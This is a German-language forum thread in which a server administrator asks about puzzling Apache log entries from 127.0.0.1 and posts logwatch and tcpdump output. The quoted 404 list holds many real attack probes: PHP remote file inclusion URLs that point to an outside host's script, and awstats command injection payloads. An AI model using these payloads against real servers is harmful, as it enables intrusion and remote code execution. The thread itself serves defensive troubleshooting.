Hallo,

im logwatch-Bericht ist mir für die letzten Tage folgendes aufgefallen:


400 Bad Request
/: 1006 Time(s)
/w00tw00t.at.ISC.SANS.DFind:): 1 Time(s)

Im Apache-Log finden sich jede Menge folgender Einträge, die bis auf die Uhrzeit identisch sind:


127.0.0.1 - - [23/Feb/2007:09:43:26 +0100] "GET /" 400 470 "-" "-"

Diese Anfragen kommen angeblich alle von 127.0.0.1. Kann das trotzdem jemand von außen sein? Da auf meinem Server in letzter Zeit sehr viele Exploits ausprobiert werden, mache ich mir da schon Gedanken...

Da auf meinem Server in letzter Zeit sehr viele Exploits ausprobiert werden, mache ich mir da schon Gedanken...
was meinst Du denn konkret damit?

Probierst Du was aus oder probieren andere was aus?

Ansonsten:
http://www.google.com/search?q=w00tw00t.at.ISC.SANS.DFind&ie=utf-8&oe=utf-8&rls=org.mozilla:de:official&client=firefox-a

... meint sowohl das eine wie auch das andere :-)

Nein, ich probiere da nichts aus, aber wohl andere, wie z.B. ein Log von Vorgestern zeigt:


404 Not Found
/BE_config.php?_PSL[classdir]=http://www.d ... trum.cz/M.txt?/: 1 Time(s)
/DOCEBO205/modules/credits/help.php?lang=h ... trum.cz/M.txt?/: 1 Time(s)
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6403 ... MVER=4&CAPREQ=0: 1 Time(s)
/My_eGallery/public/displayCategory.php?ba ... trum.cz/M.txt?/: 1 Time(s)
/Packages.php?sourcedir=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/_functions.php?prefix=http://www.deko-centrum.cz/M.txt?/: 2 Time(s)
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6403 ... MVER=4&CAPREQ=0: 1 Time(s)
/acid/admin/menu.php?root_path=http://www. ... trum.cz/M.txt?/: 1 Time(s)
/addedit.php?root_dir=http://www.deko-centrum.cz/M.txt?/: 2 Time(s)
/addevent.inc.php?agendax_path=http://www. ... trum.cz/M.txt?/: 2 Time(s)
/addpost_newpoll.php?addpoll=preview&thisp ... trum.cz/M.txt?/: 1 Time(s)
/addsite.php?returnpath=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/admin.php?cal_dir=http://www.deko-centrum.cz/M.txt?/: 4 Time(s)
/admin/addentry.php?phpbb_root_path=http:/ ... trum.cz/M.txt?/: 1 Time(s)
/admin/common-menu.php?CONF[local_path]=ht ... trum.cz/M.txt?/: 1 Time(s)
/admin/dotwidgetc_config.php?file_path=htt ... trum.cz/M.txt?/: 1 Time(s)
/admin/lib_action_step.php?GLOBALS[CLASS_P ... trum.cz/M.txt?/: 1 Time(s)
/affich.php?base=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/agenda.php3?rootagenda=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/agenda2.php3?rootagenda=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/album_portal.php?phpbb_root_path=http://w ... trum.cz/M.txt?/: 2 Time(s)
/app/edocument/core/edocument_edoccorrecti ... trum.cz/M.txt?/: 1 Time(s)
/app/edocument/edocument_basic_view_menu.p ... trum.cz/M.txt?/: 1 Time(s)
/app/eproject/eproject_basic_view_menu.php ... trum.cz/M.txt?/: 1 Time(s)
/app/webeditor/login.cgi?username=&command ... trum.cz/M.txt?/: 1 Time(s)
/applications/faq/Bs_Faq.class.php?APP[pat ... trum.cz/M.txt?/: 1 Time(s)
/applications/filemanager/viewer.php?APP[p ... trum.cz/M.txt?/: 1 Time(s)
/applications/websearchengine/Bs_Wse_Profi ... trum.cz/M.txt?/: 1 Time(s)
/apps/template.php?pagina=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/arquivo.php?data=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/articles.cgi?a=34&t=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/ashheadlines.php?pathtoashnews=http://www ... trum.cz/M.txt?/: 1 Time(s)
/ashnews.php?pathtoashnews=http://www.deko ... trum.cz/M.txt?/: 1 Time(s)
/auktion.pl?menue=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/auth.cookie.inc.php?da_path=http://www.de ... trum.cz/M.txt?/: 1 Time(s)
/auth.sessions.inc.php?da_path=http://www. ... trum.cz/M.txt?/: 1 Time(s)
/awstats.pl?pluginmode=:system(id);%00: 2 Time(s)
/awstats/awstats.pl?pluginmode=:system(id);%00: 2 Time(s)
/becommunity/community/index.php?pageurl=h ... trum.cz/M.txt?/: 1 Time(s)
/biznews.cgi?a=33&t=http://www.deko-centrum.cz/M.txt?/: 2 Time(s)
/blend_data/blend_common.php?phpbb_root_pa ... trum.cz/M.txt?/: 1 Time(s)
/browser/www/header.inc.php=http://www.dek ... trum.cz/M.txt?/: 1 Time(s)
/browser/www/header.inc.php?=http://www.de ... trum.cz/M.txt?/: 1 Time(s)
/bytehoard/includes/webdav/server.php?bhco ... trum.cz/M.txt?/: 1 Time(s)
/cached.php3?GLOBALS[AA_INC_PATH]=http://w ... trum.cz/M.txt?/: 1 Time(s)
/calendar.pl?command=login&fromTemplate=ht ... ntrum.cz/M.txt?: 1 Time(s)
/cart_content.php?cart_isp_root=http://www ... trum.cz/M.txt?/: 1 Time(s)
/cb/cms/plugins/col_man/column.inc.php?lan ... trum.cz/M.txt?/: 1 Time(s)
/ccbill/whereami.cgi?g=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/cgi-bin/1/cmd.cgi=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/cgi-bin/acart/acart.pl?&page=http://www.d ... trum.cz/M.txt?/: 1 Time(s)
/cgi-bin/awstats.pl?pluginmode=:system(id);%00: 2 Time(s)
/cgi-bin/awstats.pl?update=1&logfile=http: ... trum.cz/M.txt?/: 1 Time(s)
/cgi-bin/awstats/awstats.pl?configdir=http ... trum.cz/M.txt?/: 1 Time(s)
/cgi-bin/awstats/awstats.pl?pluginmode=:system(id);%00: 2 Time(s)
/cgi-bin/bbs/read.cgi?file=http://www.deko ... trum.cz/M.txt?/: 1 Time(s)
/cgi-bin/bp/bp-lib.pl?g=http://www.deko-centrum.cz/M.txt?: 1 Time(s)
/cgi-bin/hinsts.pl?=http://www.deko-centrum.cz/M.txt?: 1 Time(s)
/cgi-bin/ikonboard.cgi=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/cgi-bin/index.cgi?page=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/cgi-bin/jammail.pl?job=showoldmail&mail=h ... trum.cz/M.txt?/: 1 Time(s)
/cgi-bin/probe.cgi?olddat=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/cgi-bin/quikstore.cgi?category=http://www ... trum.cz/M.txt?/: 1 Time(s)
/cgi-bin/telnet.cgi=http://www.deko-centrum.cz/M.txt?: 1 Time(s)
/cgi-bin/ubb/ubb.cgi?g=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/cgi-sys/guestbook.cgi?user=cpanel&templat ... trum.cz/M.txt?/: 1 Time(s)
/class/Wiki/Wiki.php?c_node[class_path]=ht ... trum.cz/M.txt?/: 1 Time(s)
/classes/adodbt/sql.php?classes_dir=http:/ ... trum.cz/M.txt?/: 1 Time(s)
/classes/main_class.php?default_path=http: ... trum.cz/M.txt?/: 1 Time(s)
/classes/phpmailer/class.cs_phpmailer.php? ... trum.cz/M.txt?/: 1 Time(s)
/cms-bandits/dialogs/img.php?spaw_root=htt ... trum.cz/M.txt?/: 1 Time(s)
/cms/plugins/poll/poll.inc.php?lang_path=h ... trum.cz/M.txt?/: 1 Time(s)
/contacts.php?cal_dir=http://www.deko-centrum.cz/M.txt?/: 2 Time(s)
/contrib/forms/evaluation/C_FormEvaluation ... trum.cz/M.txt?/: 1 Time(s)
/convert-date.php?cal_dir=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/cron.php?ROOT_PATH=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/csv_db/csv_db.cgi?fil: 1 Time(s)
/default.php?page=http://www.deko-centrum.cz/M.txt?/: 4 Time(s)
/default/theme.php?THEME_DIR=http://www.de ... trum.cz/M.txt?/: 1 Time(s)
/deportes.cgi?a=latest&t=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/direct.php?rf=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/displayCategory.php?basepath=http://www.d ... trum.cz/M.txt?/: 1 Time(s)
/doceboCore/lib/lib.php?GLOBALS[where_fram ... trum.cz/M.txt?/: 1 Time(s)
/doceboKms/modules/documents/tree.document ... trum.cz/M.txt?/: 1 Time(s)
/doceboScs/lib/lib.teleskill.php?GLOBALS[w ... trum.cz/M.txt?/: 1 Time(s)
/docebocms/lib/lib.simplesel.php?GLOBALS[w ... trum.cz/M.txt?/: 1 Time(s)
/dotproject/modules/files/index_table.php?root_dir=/: 1 Time(s)
/drucken.php?config[fsBase]=http://www.dek ... trum.cz/M.txt?/: 1 Time(s)
/editor.php?root=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/email_an_benutzer.php?config[fsBase]=http ... trum.cz/M.txt?/: 1 Time(s)
/embed/day.php?path=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/emsgb/easymsgb.pl?print=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/encore/forumcgi/display.cgi?preftemp=temp ... trum.cz/M.txt?/: 1 Time(s)
/event.php?myevent_path=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/events.cgi?a=155&t=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/events.cgi?t=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/expanded.php?conf=http://www.deko-centrum.cz/M.txt?/: 2 Time(s)
/extras/poll/poll.php?file_newsportal=http ... trum.cz/M.txt?/: 1 Time(s)
/ezusermanager_pwd_forgott.php?ezUserManag ... trum.cz/M.txt?/: 1 Time(s)
/favicon.ico: 7 Time(s)
/fileseek.cgi?head=&foot=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/foing/index.php?phpbb_root_path=http://ww ... trum.cz/M.txt?/: 1 Time(s)
/folder.php?id=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/forum.php?act=: 1 Time(s)
/forums/viewtopic.php?pid=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/go.php3?GLOBALS[AA_INC_PATH]=http://www.d ... trum.cz/M.txt?/: 1 Time(s)
/grademade/index.php?page=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/hall.php?file=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/hall.php?page=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/header.php?systempath=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/home.php?action=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/home.php?content=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/home.php?pagina=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/home.php?x=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/html/affich.php?base=: 1 Time(s)
/htmltonuke.php?filnavn=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/i-mall/i-mall.cgi?p=http://www.deko-centrum.cz/M.txt?: 1 Time(s)
/ideabox/include.php?gorumDir=http://www.d ... trum.cz/M.txt?/: 1 Time(s)
/ihm.php?p=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/in.php?returnpath=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/inc/adminheader.inc.php?path=http://www.d ... trum.cz/M.txt?/: 1 Time(s)
/inc/logincheck.inc.php?path=http://www.de ... trum.cz/M.txt?/: 1 Time(s)
/include.php?gorumDir=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/include/SQuery/gameSpy2.php?libpath=http: ... trum.cz/M.txt?/: 1 Time(s)
/include/write.php?dir=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/includes/class_template.php?quezza_root_p ... trum.cz/M.txt?/: 1 Time(s)
/includes/common.inc?file_path=http://www. ... trum.cz/M.txt?/: 1 Time(s)
/includes/common.php?root_path=http://www. ... trum.cz/M.txt?/: 1 Time(s)
/includes/dbal.php?eqdkp_root_path=http:// ... trum.cz/M.txt?/: 1 Time(s)
/includes/kb_constants.php?module_root_pat ... trum.cz/M.txt?/: 1 Time(s)
/includes/pafiledb_constants.php?module_ro ... trum.cz/M.txt?/: 1 Time(s)
/index.php?Language=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/index.php?Load=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/index.php?action=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/index.php?canal=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/index.php?cat=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/index.php?configFile=http://www.deko-centrum.cz/M.txt?/: 3 Time(s)
/index.php?cont=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/index.php?do=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/index.php?include=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/index.php?langc=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/index.php?link=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/index.php?lng=../../include/main.inc&G_PA ... trum.cz/M.txt?/: 2 Time(s)
/index.php?meio.php=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/index.php?middle=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/index.php?open=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/index.php?ort=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/index.php?pag=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/index.php?pageurl=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/index.php?screen=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/index.php?visualizar=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/index.php?x=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/index.phpmain.php?x=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/index0.php?show=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/index1.php?choix=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/index1.php?dat=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/index1.php?menu=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/index1.php?site=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/index1.php?x=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/index2.php?DoAction=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/index2.php?ID=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/index2.php?ascii_seite=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/index2.php?content=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/index2.php?showpage=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/index2.php?url_page=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/index2.php?x=http://www.deko-centrum.cz/M.txt?/: 2 Time(s)
/index_table.php?root_dir=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/init.inc.php?CPG_M_DIR=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/init.php?HTTP_POST_VARS=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/initdb.php?absolute_path=http://www.deko-centrum.cz/M.txt?/: 2 Time(s)
/jobs.cgi?a=9&t=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/latinbitz.cgi?t=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/lc.cgi?a=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/lib.inc.php?pm_path=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/lib.php?root=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/library/editor/editor.php?root=http://www ... trum.cz/M.txt?/: 1 Time(s)
/main.php?link=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/main.php?page=http://www.deko-centrum.cz/M.txt?/: 2 Time(s)
/main.php?pagina=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/main.php?x=http://www.deko-centrum.cz/M.txt?/: 3 Time(s)
/mainfile.php?MAIN_PATH=http://www.deko-centrum.cz/M.txt?/: 2 Time(s)
/manager/frontinc/prepend.php?_PX_config[m ... trum.cz/M.txt?/: 1 Time(s)
/master.php?root_path=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/media.cgi?a=11&t=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/media.php?page=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/mod/authent.php4?rootpath=http://www.deko ... trum.cz/M.txt?/: 1 Time(s)
/mod_mainmenu.php?mosConfig_absolute_path= ... trum.cz/M.txt?/: 1 Time(s)
/module_db.php?pivot_path=http://www.deko-centrum.cz/M.txt?/: 3 Time(s)
/modules/4nAlbum/public/displayCategory.ph ... trum.cz/M.txt?/: 1 Time(s)
/modules/Forums/admin/admin_ug_auth.php?ph ... trum.cz/M.txt?/: 1 Time(s)
/modules/Forums/admin/index.php?phpbb_root ... trum.cz/M.txt?/: 1 Time(s)
/modules/coppermine/include/init.inc.php?C ... trum.cz/M.txt?/: 1 Time(s)
/modules/mod_mainmenu.php?mosConfig_absolu ... trum.cz/M.txt?/: 1 Time(s)
/modules/tasks/viewgantt.php?root_dir=: 1 Time(s)
/modules/xgallery/upgrade_album.php?GALLER ... trum.cz/M.txt?/: 1 Time(s)
/modules/xoopsgallery/upgrade_album.php?GA ... trum.cz/M.txt?/: 1 Time(s)
/movie_cls.php?full_path=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/mysql/config.header.inc.php?view=http://w ... trum.cz/M.txt?/: 2 Time(s)
/new-visitor.inc.php?lvc_include_dir=http: ... trum.cz/M.txt?/: 2 Time(s)
/news.cgi?a=114&t=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/news.cgi?a=latest&t=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/news.cgi?t=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/news/sources/functions.php?CONFIG[main_pa ... trum.cz/M.txt?/: 1 Time(s)
/newsdesk.cgi?a=latest&t=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/newsdesk.cgi?t=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/newsupdate.cgi?a=latest&t=http://www.deko ... trum.cz/M.txt?/: 1 Time(s)
/noticias.php?arq=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/packages: 1 Time(s)
/packages.php?id=3553: 1 Time(s)
/packages.php?id=4145: 1 Time(s)
/pages.php?page=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/phpBB/blend_data/blend_common.php?phpbb_r ... trum.cz/M.txt?/: 1 Time(s)
/phpOnDirectory/admin/generate_category_ht ... trum.cz/M.txt?/: 1 Time(s)
/phplive/help.php?css_path=http://www.deko ... trum.cz/M.txt?/: 1 Time(s)
/phpshop/index.php?base_dir=http://www.dek ... trum.cz/M.txt?/: 1 Time(s)
/pipe.php?HCL_path=http://www.deko-centrum.cz/M.txt?/: 2 Time(s)
/pivot/modules/module_db.php?pivot_path=ht ... trum.cz/M.txt?/: 1 Time(s)
/pm/lib.inc.php?pm_path=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/port.php?content=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/powerup.cgi?a=latest&t=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/print.php?page=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/printfriendly.php?file_path=http://www.de ... trum.cz/M.txt?/: 1 Time(s)
/public_includes/pub_popup/popup_finduser. ... trum.cz/M.txt?/: 1 Time(s)
/rdf_news.php: 13 Time(s)
/reconfig.php?GLOBALS[CLPath]=http://www.d ... trum.cz/M.txt?/: 1 Time(s)
/redaxo/include/addons/image_resize/pages/ ... trum.cz/M.txt?/: 1 Time(s)
/redaxo/include/addons/import_export/pages ... trum.cz/M.txt?/: 1 Time(s)
/redsys/404.php?REDSYS[MYPATH][TEMPLATES]= ... trum.cz/M.txt?/: 1 Time(s)
/reporter.cgi?t=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/robots.txt: 50 Time(s)
/secure_img_render.php?p=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/services.php?page=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/shop.pl/page=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/shoutbox/expanded.php?conf=http://www.dek ... trum.cz/M.txt?/: 1 Time(s)
/show.php?page=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/show.php?path=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/showArticle.php?link=Wireless_Setup_(Deutsch): 1 Time(s)
/snort/includes/base_include.inc.php?BASE_ ... trum.cz/M.txt?/: 1 Time(s)
/sources/Admin/admin_import.php?CONFIG[mai ... trum.cz/M.txt?/: 1 Time(s)
/sources/functions.php?CONFIG[main_path]=h ... trum.cz/M.txt?/: 1 Time(s)
/sources/join.php?FORM[url]=owned&CONFIG[c ... trum.cz/M.txt?/: 1 Time(s)
/srxclr.php?GLOBALS[CLPath]=http://www.dek ... trum.cz/M.txt?/: 1 Time(s)
/start_lobby.php?CONFIG[MWCHAT_Libs]=http: ... trum.cz/M.txt?/: 1 Time(s)
/step_one.php?server_inc=http://www.deko-centrum.cz/M.txt?/: 2 Time(s)
/step_one_tables.php?server_inc=http://www ... trum.cz/M.txt?/: 1 Time(s)
/support_page.cgi?file_name=http://www.dek ... trum.cz/M.txt?/: 1 Time(s)
/template.php?goto=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/template.php?pagina=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/theme.php?THEME_DIR=http://www.deko-centrum.cz/M.txt?/: 2 Time(s)
/toplist.php?f=toplist_top10&phpbb_root_pa ... trum.cz/M.txt?/: 1 Time(s)
/ubbt.inc.php?GLOBALS[thispath]=http://www ... trum.cz/M.txt?/: 1 Time(s)
/upgrade_album.php?GALLERY_BASEDIR=http:// ... trum.cz/M.txt?/: 2 Time(s)
/v-webmail/includes/mailaccess/pop3.php?CO ... trum.cz/M.txt?/: 2 Time(s)
/video.php?content=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/view.php?page=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/view.php?root_dir=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/viewgantt.php?root_dir=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/vote.pl?action=show&id=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/vw_files.php?root_dir=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/webmail/includes/mailaccess/pop3/core.php ... trum.cz/M.txt?/: 1 Time(s)
/whereami.cgi?g=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/wikiwig/_wk/wk_lang.php?WK[wkPath]=http:/ ... trum.cz/M.txt?/: 1 Time(s)
/word.php?id=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/write.php?dir=http://www.deko-centrum.cz/M.txt?/: 2 Time(s)
/xtremenews/sources/post.php?fil_config=ht ... trum.cz/M.txt?/: 1 Time(s)
/zboard/zboard.php=http://www.deko-centrum.cz/M.txt?/: 1 Time(s)
/~pierre/composite.png: 1 Time(s)
/~pierre/gallery2: 1 Time(s)
/~pierre/packages/x86_64/pierre.db.tar.gz: 1 Time(s)
http://www.spedia.net/sp_login.htm: 1 Time(s)


Was mich mehr beunruhigt ist der Request, der angeblich von 127.0.0.1 kommt.

Hi!



/~pierre/composite.png: 1 Time(s)
/~pierre/gallery2: 1 Time(s)
/~pierre/packages/x86_64/pierre.db.tar.gz: 1 Time(s)
Das warst hoffentlich du selbst, sonst würde ich mir wirklich Gedanken machen.

Gruß
fuffy

Nein, das war ich nicht selbst und das sind auch wirklich die einzigen harmloses 404 in der Liste ;-) (also die ohne böse Absichten)

Irgendwie sieht das auch, als ob ein Programm auf deinem Server wäre wie z.b. ne Remoteshell die von einen Skriptkiddie kontrolliert wird.
Oder ein Programm, dass PHP-Include-Exploits sinnlos durchtestet Oo. Aber sehr seltsam, wenn man nämlich schon Zugriff hätte, warum sollte man dann Exploits durchtesten?
Am besten mal schauen, welche Programme so laufen und die unbekannten killen, falls es sich dann nichts mehr tut, sollte es passen :)

Gruß

Wie kommst Du denn auf eine installierte Remote-Shell?

... auf die Begründung bin ich auch gespannt...

Ich sehe da auch keinen Hinweis drauf. Interessant ist eben, wie folgender Logeintrag zustande kommt:


127.0.0.1 - - [23/Feb/2007:09:43:26 +0100] "GET /" 400 470 "-" "-"

Wenn ich nämlich via "telnet localhost 80" ein "GET /" abschcike, so steht im Log:


127.0.0.1 - - [23/Feb/2007:18:06:22 +0100] "GET /" 200 1525 "-" "-"

kommen denn nur die "GET /" von 127.0.0.1 oder die anderen, weniger langweiligen Anfragen auch?

Nein, nur der "GET /"-Request kommt von 127.0.0.1. Die anderen sehen so aus und machen mir nicht wirklich Angst:


213.157.163.225 - - [21/Feb/2007:11:51:31 +0100] "GET /main.php?link=http://www.deko-centrum.cz/M.txt?/ HTTP/1.1" 404 206 "-" "Morfeus ****ing Scanner"

könnte das bei dir eine webalizer anfrage sein, die ins leere führt ?

Nö, weil webalizer läuft nur einmal täglich; diese Requests habe ich aber "ständig".

Ein vergessenes Check Skript?

Und kommt immer erst 400 und dann 200? (vs. unterschdl. HTTP Versionen)
Log doch mal mit tcpdump auf localhost.

Gruss 403

OK, habe mal txpdump laufen lassen; während obige Requests im Log erscheinen spuckte tcpdump folgendes aus:


[root@laber-land pierre]# tcpdump -i lo
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on lo, link-type EN10MB (Ethernet), capture size 96 bytes
20:40:36.033865 IP laber-land.de.40492 > laber-land.de.www: S 1188544929:1188544929(0) win 32792 <mss 16396,sackOK,timestamp 63450748 0,nop,wscale 2>
20:40:36.033945 IP laber-land.de.www > laber-land.de.40492: S 1191876554:1191876554(0) ack 1188544930 win 32768 <mss 16396,sackOK,timestamp 63450748 63450748,nop,wscale 2>
20:40:36.035088 IP laber-land.de.40492 > laber-land.de.www: . ack 1 win 8198 <nop,nop,timestamp 63450748 63450748>
20:40:39.631321 IP laber-land.de.www > laber-land.de.40492: S 1191876554:1191876554(0) ack 1188544930 win 32768 <mss 16396,sackOK,timestamp 63451648 63450748,nop,wscale 2>
20:40:39.631389 IP laber-land.de.40492 > laber-land.de.www: . ack 1 win 8198 <nop,nop,timestamp 63451648 63451648,nop,nop,sack 1 {0:1}>
20:40:45.631373 IP laber-land.de.www > laber-land.de.40492: S 1191876554:1191876554(0) ack 1188544930 win 32768 <mss 16396,sackOK,timestamp 63453148 63451648,nop,wscale 2>
20:40:45.631445 IP laber-land.de.40492 > laber-land.de.www: . ack 1 win 8198 <nop,nop,timestamp 63453148 63453148,nop,nop,sack 1 {0:1}>
20:40:53.108342 IP laber-land.de.40492 > laber-land.de.www: P 1:6(5) ack 1 win 8198 <nop,nop,timestamp 63455017 63453148>
20:40:53.108429 IP laber-land.de.www > laber-land.de.40492: . ack 6 win 8192 <nop,nop,timestamp 63455017 63455017>
20:40:53.834228 IP laber-land.de.40492 > laber-land.de.www: P 6:8(2) ack 1 win 8198 <nop,nop,timestamp 63455198 63455017>
20:40:53.834274 IP laber-land.de.www > laber-land.de.40492: . ack 8 win 8192 <nop,nop,timestamp 63455198 63455198>
20:40:53.835207 IP laber-land.de.www > laber-land.de.40492: P 1:218(217) ack 8 win 8192 <nop,nop,timestamp 63455198 63455198>
20:40:53.835270 IP laber-land.de.40492 > laber-land.de.www: . ack 218 win 8198 <nop,nop,timestamp 63455198 63455198>
20:40:53.835693 IP laber-land.de.40492 > laber-land.de.www: P 8:11(3) ack 218 win 8198 <nop,nop,timestamp 63455199 63455198>
20:40:53.835877 IP laber-land.de.www > laber-land.de.40492: F 218:218(0) ack 11 win 8192 <nop,nop,timestamp 63455199 63455199>
20:40:53.836084 IP laber-land.de.40492 > laber-land.de.www: F 11:11(0) ack 219 win 8198 <nop,nop,timestamp 63455199 63455199>
20:40:53.836138 IP laber-land.de.www > laber-land.de.40492: . ack 12 win 8192 <nop,nop,timestamp 63455199 63455199>
20:40:54.127632 IP laber-land.de.42966 > laber-land.de.https: S 1206061665:1206061665(0) win 32792 <mss 16396,sackOK,timestamp 63455272 0,nop,wscale 2>
20:40:54.127697 IP laber-land.de.https > laber-land.de.42966: S 1199176351:1199176351(0) ack 1206061666 win 32768 <mss 16396,sackOK,timestamp 63455272 63455272,nop,wscale 2>
20:40:54.128148 IP laber-land.de.42966 > laber-land.de.https: . ack 1 win 8198 <nop,nop,timestamp 63455272 63455272>
20:40:54.128548 IP laber-land.de.42966 > laber-land.de.https: P 1:67(66) ack 1 win 8198 <nop,nop,timestamp 63455272 63455272>
20:40:54.128628 IP laber-land.de.https > laber-land.de.42966: . ack 67 win 8192 <nop,nop,timestamp 63455272 63455272>
20:40:54.129655 IP laber-land.de.https > laber-land.de.42966: P 1:471(470) ack 67 win 8192 <nop,nop,timestamp 63455272 63455272>
20:40:54.129743 IP laber-land.de.https > laber-land.de.42966: F 471:471(0) ack 67 win 8192 <nop,nop,timestamp 63455272 63455272>
20:40:54.130332 IP laber-land.de.42966 > laber-land.de.https: . ack 471 win 8198 <nop,nop,timestamp 63455272 63455272>
20:40:54.130671 IP laber-land.de.42966 > laber-land.de.https: R 67:67(0) ack 472 win 8198 <nop,nop,timestamp 63455272 63455272>
